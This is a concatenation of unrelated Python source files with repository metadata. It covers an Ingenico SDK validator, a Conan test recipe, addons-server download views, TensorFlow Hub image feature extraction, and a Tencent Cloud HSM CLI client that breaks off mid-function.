ingenico/direct/sdk/domain/fixed_list_validator.py
|
Ingenico/direct-sdk-python2
|
1c5c08fe2281aa99bfe8e8e031071600cb3be11d
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# This class was auto-generated from the API references found at
# https://support.direct.ingenico.com/documentation/api/reference/
#
from ingenico.direct.sdk.data_object import DataObject
class FixedListValidator(DataObject):
__allowed_values = None
@property
def allowed_values(self):
"""
Type: list[str]
"""
return self.__allowed_values
@allowed_values.setter
def allowed_values(self, value):
self.__allowed_values = value
def to_dictionary(self):
dictionary = super(FixedListValidator, self).to_dictionary()
if self.allowed_values is not None:
dictionary['allowedValues'] = []
for element in self.allowed_values:
if element is not None:
dictionary['allowedValues'].append(element)
return dictionary
def from_dictionary(self, dictionary):
super(FixedListValidator, self).from_dictionary(dictionary)
if 'allowedValues' in dictionary:
if not isinstance(dictionary['allowedValues'], list):
raise TypeError('value \'{}\' is not a list'.format(dictionary['allowedValues']))
self.allowed_values = []
for element in dictionary['allowedValues']:
self.allowed_values.append(element)
return self
| 32.52381 | 97 | 0.644949 |
662f4208b526f4ac84a3e39af6d0244fbb63218b
| 1,646 |
py
|
Python
|
jigls/jeditor/operations/nodefactory.py
|
ironWolf1990/python-jils
|
87390cf871329e9a47f985b4f0c9fc9506bfdb91
|
[
"MIT"
] | 2 |
2021-04-08T14:57:58.000Z
|
2021-07-26T00:57:49.000Z
|
jigls/jeditor/operations/nodefactory.py
|
ironWolf1990/python-jils
|
87390cf871329e9a47f985b4f0c9fc9506bfdb91
|
[
"MIT"
] | null | null | null |
jigls/jeditor/operations/nodefactory.py
|
ironWolf1990/python-jils
|
87390cf871329e9a47f985b4f0c9fc9506bfdb91
|
[
"MIT"
] | 3 |
2021-05-19T18:48:57.000Z
|
2021-07-26T00:55:23.000Z
|
# import logging
# from typing import Dict, Optional
# from jigls.jeditor.base.nodebase import JBaseNode
# from jigls.jeditor.constants import JCONSTANTS
# from jigls.jeditor.ui.graphicnode import JGraphicsNode
# from jigls.logger import logger
# logger = logging.getLogger(__name__)
# class JNodeFactory:
# def __init__(self) -> None:
# self._nodeRegistry: Dict[str, object] = {}
# pass
# @property
# def nodeRegistry(self):
# return self._nodeRegistry
# def RegisterNode(self, name: str, node: object):
# if name is self._nodeRegistry:
# logger.warning("node with name already registered")
# return
# self._nodeRegistry[name] = node
# def RegisterNodes(self, nodeDict: Dict[str, object]):
# for k, v in nodeDict.items():
# self.RegisterNode(k, v)
# def CreateRegisteredNode(self, nodeName: str) -> Optional[object]:
# if nodeName not in self._nodeRegistry:
# logger.error(f"node name {nodeName} not in registry")
# return
# return self._nodeRegistry[nodeName]
# def CreateGenericNode(self, inputMulti, outputMulti, inputs=2, output=1, *args, **kwargs):
# base = JBaseNode("base node")
# for i in range(inputs):
# base.AddInputSocket(
# name=f"in{i}",
# multiConnection=inputMulti,
# )
# for _ in range(output):
# base.AddOutputSocket(
# name="out1",
# multiConnection=outputMulti,
# )
# node = JGraphicsNode(base)
# return node
| 30.481481 | 96 | 0.597813 |
84ee68733e5167ff90d0886ff60ca505713d9771
| 480 |
py
|
Python
|
recipes/tinyply/all/test_package/conanfile.py
|
rockandsalt/conan-center-index
|
d739adcec3e4dd4c250eff559ceb738e420673dd
|
[
"MIT"
] | 562 |
2019-09-04T12:23:43.000Z
|
2022-03-29T16:41:43.000Z
|
recipes/tinyply/all/test_package/conanfile.py
|
rockandsalt/conan-center-index
|
d739adcec3e4dd4c250eff559ceb738e420673dd
|
[
"MIT"
] | 9,799 |
2019-09-04T12:02:11.000Z
|
2022-03-31T23:55:45.000Z
|
recipes/tinyply/all/test_package/conanfile.py
|
rockandsalt/conan-center-index
|
d739adcec3e4dd4c250eff559ceb738e420673dd
|
[
"MIT"
] | 1,126 |
2019-09-04T11:57:46.000Z
|
2022-03-31T16:43:38.000Z
|
import os
from conans import ConanFile, CMake, tools
class TestPackageConan(ConanFile):
settings = "os", "compiler", "build_type", "arch"
generators = "cmake", "cmake_find_package_multi"
def build(self):
cmake = CMake(self)
cmake.configure()
cmake.build()
def test(self):
if not tools.cross_building(self.settings):
bin_path = os.path.join("bin", "test_package")
self.run(bin_path, run_environment=True)
| 26.666667 | 58 | 0.641667 |
36ec3873f8a1b4a2a578b18b0fe3fb1d4e845fa6
| 7,218 |
py
|
Python
|
src/olympia/versions/views.py
|
atiqueahmedziad/addons-server
|
6e1cc00bf15d245fbcdddf618286bba943731e45
|
[
"BSD-3-Clause"
] | 2 |
2019-08-18T13:00:40.000Z
|
2019-11-17T02:18:04.000Z
|
src/olympia/versions/views.py
|
atiqueahmedziad/addons-server
|
6e1cc00bf15d245fbcdddf618286bba943731e45
|
[
"BSD-3-Clause"
] | null | null | null |
src/olympia/versions/views.py
|
atiqueahmedziad/addons-server
|
6e1cc00bf15d245fbcdddf618286bba943731e45
|
[
"BSD-3-Clause"
] | null | null | null |
import os
from django import http
from django.db.transaction import non_atomic_requests
from django.shortcuts import get_object_or_404, redirect
import olympia.core.logger
from olympia import amo
from olympia.access import acl
from olympia.addons.decorators import (
addon_view_factory, owner_or_unlisted_reviewer)
from olympia.addons.models import Addon
from olympia.amo.urlresolvers import reverse
from olympia.amo.utils import HttpResponseSendFile, render, urlparams
from olympia.files.models import File
from olympia.versions.models import Version
from olympia.lib.cache import cache_get_or_set, make_key
# The version detail page redirects to the version within pagination, so we
# need to enforce the number of versions per page.
PER_PAGE = 30
addon_view = addon_view_factory(Addon.objects.valid)
log = olympia.core.logger.getLogger('z.versions')
def _version_list_qs(addon):
# We only show versions that have files with the right status.
if addon.is_unreviewed():
status = amo.STATUS_AWAITING_REVIEW
else:
status = amo.STATUS_PUBLIC
return (addon.versions.filter(channel=amo.RELEASE_CHANNEL_LISTED)
.filter(files__status=status)
.distinct().order_by('-created'))
@addon_view
@non_atomic_requests
def version_list(request, addon):
qs = _version_list_qs(addon)
versions = amo.utils.paginate(request, qs, PER_PAGE)
versions.object_list = list(versions.object_list)
Version.transformer(versions.object_list)
return render(request, 'versions/version_list.html', {
'addon': addon, 'versions': versions})
@addon_view
@non_atomic_requests
def version_detail(request, addon, version_num):
# TODO: Does setting this in memcachd even make sense?
# This is specific to an add-ons version so the chance of this hitting
# the cache and not missing seems quite bad to me (cgrebs)
def _fetch():
qs = _version_list_qs(addon)
return list(qs.values_list('version', flat=True))
cache_key = make_key(
u'version-detail:{}:{}'.format(addon.id, version_num),
normalize=True)
ids = cache_get_or_set(cache_key, _fetch)
url = reverse('addons.versions', args=[addon.slug])
if version_num in ids:
page = 1 + ids.index(version_num) / PER_PAGE
to = urlparams(url, 'version-%s' % version_num, page=page)
return http.HttpResponseRedirect(to)
else:
raise http.Http404()
@addon_view
@non_atomic_requests
def update_info(request, addon, version_num):
version = Version.objects.filter(addon=addon, version=version_num,
files__status__in=amo.VALID_FILE_STATUSES,
channel=amo.RELEASE_CHANNEL_LISTED).last()
if not version:
raise http.Http404()
return render(request, 'versions/update_info.html',
{'version': version},
content_type='application/xhtml+xml')
@non_atomic_requests
def update_info_redirect(request, version_id):
version = get_object_or_404(Version.objects, pk=version_id)
return redirect(reverse('addons.versions.update_info',
args=(version.addon.id, version.version)),
permanent=True)
# Should accept junk at the end for filename goodness.
@non_atomic_requests
def download_file(request, file_id, type=None, file_=None, addon=None):
def is_appropriate_reviewer(addon, channel):
return (acl.is_reviewer(request, addon)
if channel == amo.RELEASE_CHANNEL_LISTED
else acl.check_unlisted_addons_reviewer(request))
if not file_:
file_ = get_object_or_404(File.objects, pk=file_id)
if not addon:
addon = get_object_or_404(Addon.objects,
pk=file_.version.addon_id)
channel = file_.version.channel
if addon.is_disabled or file_.status == amo.STATUS_DISABLED:
if (is_appropriate_reviewer(addon, channel) or
acl.check_addon_ownership(
request, addon, dev=True, ignore_disabled=True)):
return HttpResponseSendFile(
request, file_.guarded_file_path,
content_type='application/x-xpinstall')
else:
log.info(
u'download file {file_id}: addon/file disabled and '
u'user {user_id} is not an owner or reviewer.'.format(
file_id=file_id, user_id=request.user.pk))
raise http.Http404() # Not owner or admin.
if channel == amo.RELEASE_CHANNEL_UNLISTED:
if (acl.check_unlisted_addons_reviewer(request) or
acl.check_addon_ownership(
request, addon, dev=True, ignore_disabled=True)):
return HttpResponseSendFile(
request, file_.file_path,
content_type='application/x-xpinstall')
else:
log.info(
u'download file {file_id}: version is unlisted and '
u'user {user_id} is not an owner or reviewer.'.format(
file_id=file_id, user_id=request.user.pk))
raise http.Http404() # Not owner or admin.
attachment = bool(type == 'attachment')
loc = urlparams(file_.get_file_cdn_url(attachment=attachment),
filehash=file_.hash)
response = http.HttpResponseRedirect(loc)
response['X-Target-Digest'] = file_.hash
return response
def guard():
return Addon.objects.filter(_current_version__isnull=False)
@addon_view_factory(guard)
@non_atomic_requests
def download_latest(request, addon, type='xpi', platform=None):
platforms = [amo.PLATFORM_ALL.id]
if platform is not None and int(platform) in amo.PLATFORMS:
platforms.append(int(platform))
version = addon._current_version_id
files = File.objects.filter(platform__in=platforms,
version=version)
try:
# If there's a file matching our platform, it'll float to the end.
file_ = sorted(files, key=lambda f: f.platform == platforms[-1])[-1]
except IndexError:
raise http.Http404()
return download_file(request, file_.id, type=type, file_=file_,
addon=addon)
@non_atomic_requests
def download_source(request, version_id):
version = get_object_or_404(Version.objects, pk=version_id)
# General case: version is listed.
if version.channel == amo.RELEASE_CHANNEL_LISTED:
if not (version.source and
(acl.check_addon_ownership(
request, version.addon, dev=True, ignore_disabled=True))):
raise http.Http404()
else:
if not owner_or_unlisted_reviewer(request, version.addon):
raise http.Http404 # Not listed, not owner or unlisted reviewer.
res = HttpResponseSendFile(request, version.source.path)
path = version.source.path
if not isinstance(path, unicode):
path = path.decode('utf8')
name = os.path.basename(path.replace(u'"', u''))
disposition = u'attachment; filename="{0}"'.format(name).encode('utf8')
res['Content-Disposition'] = disposition
return res
| 37.59375 | 79 | 0.667636 |
dcf9d9bcdcf6324de552bc3b65ea9012cfa88f70
| 7,227 |
py
|
Python
|
image_transfer_learning/image_processing.py
|
jonathan-smith-1/image_transfer_learning
|
9020ecfa45e1591b9ad6ed2abe2a2e89a180edd4
|
[
"MIT"
] | null | null | null |
image_transfer_learning/image_processing.py
|
jonathan-smith-1/image_transfer_learning
|
9020ecfa45e1591b9ad6ed2abe2a2e89a180edd4
|
[
"MIT"
] | null | null | null |
image_transfer_learning/image_processing.py
|
jonathan-smith-1/image_transfer_learning
|
9020ecfa45e1591b9ad6ed2abe2a2e89a180edd4
|
[
"MIT"
] | null | null | null |
"""Image processing functions."""
import os
import pickle
import numpy as np
import tensorflow as tf
import tensorflow_hub as hub
from skimage.io import imread
from skimage.transform import resize
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True # Needed for large images
def make_square(img):
"""
Trim an image to make it square by keeping the centre part.
Args:
img (Numpy array): Input image with shape (height, width, channels)
Returns:
Numpy array of trimmed image, with shape (new_height, new_width,
channels)
"""
height, width, _ = img.shape
if height >= width:
h_max = int(height/2 + width/2)
h_min = int(height/2 - width/2)
trimmed_image = img[h_min:h_max, :, :].copy()
else:
w_max = int(width/2 + height/2)
w_min = int(width/2 - height/2)
trimmed_image = img[:, w_min:w_max, :].copy()
return trimmed_image
def convert_images(images_path, save_path, lab_to_int=None):
"""
Convert images into feature vectors and saves them in a pickle file.
This function uses transfer learning. A pre-trained network is loaded
and used.
A dictionary mapping labels to integers can be passed in, or can be
generated and returned. This is so it can be reused on other datasets.
E.g. the training data may have more classes in than the test data,
so this mapping needs to be created using the training data and then
reused on the validation and test data.
Args:
images_path (string): Filepath of the directory containing the
training images. The images must be in
folders with the category names.
A suitable file structure is shown below:
|- images_path/
| |- category_1
| |- image_1.jpg
| |- image_2.jpg
| |- ...
| |- category_2
| |- image_3.jpg
| |- image_4.jpg
| |- ...
| |- ...
save_path (string): Filepath to a pickle file that will be created
by this function.
lab_to_int (dict): Mapping from labels (strings) to integers.
Optional argument. If provided, this dictionary
will be used. If not provided, then this
dictionary will be generated.
Returns:
A dictionary mapping from labels (strings) to integers.
"""
print('Converting images from: ' + images_path)
# Convert each image to a feature vector
feature_vectors = []
labels = []
if not lab_to_int:
_, lab_to_int = enumerate_labels(images_path)
with tf.Graph().as_default():
mod = hub.Module("https://tfhub.dev/google/imagenet/inception_v3/"
"feature_vector/1")
height, width = hub.get_expected_image_size(mod)
# [batch_size, height, width, channels]
images = tf.placeholder(tf.float32,
shape=[1, height, width, 3],
name='Input_images')
# Features have shape [batch_size, num_features].
features = mod(images)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.tables_initializer())
for category_dir in os.scandir(images_path):
label = os.path.basename(os.path.normpath(category_dir))
for image_path in os.scandir(category_dir):
print(image_path.name)
# img_num = 0 accounts for images with multiple frames
image = imread(os.path.abspath(image_path), img_num=0)
image = make_square(image)
# Constant argument prevents deprecation warning
image = resize(image, (height, width), anti_aliasing=True,
mode='constant')
image = np.expand_dims(image, axis=0)
vec = sess.run(features, feed_dict={images: image})
feature_vectors.append(vec)
labels.append(lab_to_int[label])
feature_vectors_array = np.concatenate(feature_vectors, axis=0)
labels_array = np.array(labels)
data = {'feature_vectors_array': feature_vectors_array,
'labels_array': labels_array,
'label_to_int': lab_to_int}
with open(save_path, 'wb') as file:
pickle.dump(data, file, pickle.HIGHEST_PROTOCOL)
return lab_to_int
def get_feature_vector_size(path):
"""
Get the length of the feature vectors.
Feature vectors are assumed to be in a pickle file or npz file (or
similar) that loads into a dictionary with key, value pair of
'feature_vectors_array' and a 2D numpy array of feature vectors. The
feature vectors array is a 2D numpy array of shape (num_vectors,
vector_length).
Args:
path (string): Path of file containing feature vectors.
Returns:
Nothing
"""
data = np.load(path)
return data['feature_vectors_array'].shape[1]
def get_num_classes(path):
"""
Get the number of classes in the data.
Together with the feature vectors and the labels is a dictionary mapping
the labels to integers. The size of this dictionary gives the number
of classes.
The labels to integers dictionary is assumed to be in a pickle file or
npz file (or similar) that loads into a dictionary with key, value pair of
'label_to_int' and this dictionary.
Args:
path (string): Path of file containing the mapping of labels to
integers.
Returns:
Nothing
"""
data = np.load(path)
return len(data['label_to_int'])
def enumerate_labels(path):
"""
Create dictionaries mapping label to integer and integer to label.
Args:
path (string): Filepath of the directory folders named after each
category.
A suitable file structure is shown below:
|- images_path/
| |- category_1
| |- image_1.jpg
| |- image_2.jpg
| |- ...
| |- category_2
| |- image_3.jpg
| |- image_4.jpg
| |- ...
| |- ...
Returns:
Nothing
"""
labels = set()
for category_dir in os.scandir(path):
labels.add(os.path.basename(os.path.normpath(category_dir)))
int_to_lab = dict(enumerate(sorted(labels)))
lab_to_int = {v: k for k, v in int_to_lab.items()}
return int_to_lab, lab_to_int
| 31.697368 | 78 | 0.555556 |
29e41964c1afa023ead9ff36ae2b4a3b278c743f
| 17,734 |
py
|
Python
|
tccli/services/cloudhsm/cloudhsm_client.py
|
ws0416/tencentcloud-cli
|
0a90fa77c8be1efa30b196a3eeb31b8be1f6a325
|
[
"Apache-2.0"
] | null | null | null |
tccli/services/cloudhsm/cloudhsm_client.py
|
ws0416/tencentcloud-cli
|
0a90fa77c8be1efa30b196a3eeb31b8be1f6a325
|
[
"Apache-2.0"
] | null | null | null |
tccli/services/cloudhsm/cloudhsm_client.py
|
ws0416/tencentcloud-cli
|
0a90fa77c8be1efa30b196a3eeb31b8be1f6a325
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.cloudhsm.v20191112 import cloudhsm_client as cloudhsm_client_v20191112
from tencentcloud.cloudhsm.v20191112 import models as models_v20191112
def doModifyVsmAttributes(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyVsmAttributesRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyVsmAttributes(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeVsmAttributes(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeVsmAttributesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeVsmAttributes(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeVsms(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeVsmsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeVsms(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeVpc(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeVpcRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeVpc(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeHSMByVpcId(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeHSMByVpcIdRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeHSMByVpcId(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeHSMBySubnetId(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeHSMBySubnetIdRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeHSMBySubnetId(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeUsg(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeUsgRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeUsg(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeSubnet(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeSubnetRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeSubnet(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeSupportedHsm(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeSupportedHsmRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeSupportedHsm(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doInquiryPriceBuyVsm(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.InquiryPriceBuyVsmRequest()
model.from_json_string(json.dumps(args))
rsp = client.InquiryPriceBuyVsm(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeUsgRule(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeUsgRuleRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeUsgRule(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20191112": cloudhsm_client_v20191112,
}
MODELS_MAP = {
"v20191112": models_v20191112,
}
ACTION_MAP = {
"ModifyVsmAttributes": doModifyVsmAttributes,
"DescribeVsmAttributes": doDescribeVsmAttributes,
"DescribeVsms": doDescribeVsms,
"DescribeVpc": doDescribeVpc,
"DescribeHSMByVpcId": doDescribeHSMByVpcId,
"DescribeHSMBySubnetId": doDescribeHSMBySubnetId,
"DescribeUsg": doDescribeUsg,
"DescribeSubnet": doDescribeSubnet,
"DescribeSupportedHsm": doDescribeSupportedHsm,
"InquiryPriceBuyVsm": doInquiryPriceBuyVsm,
"DescribeUsgRule": doDescribeUsgRule,
}
AVAILABLE_VERSION_LIST = [
"v20191112",
]
def action_caller():
return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = "default"
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
if OptionsDefine.Token not in cred:
cred[OptionsDefine.Token] = None
if not is_exist_profile:
if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
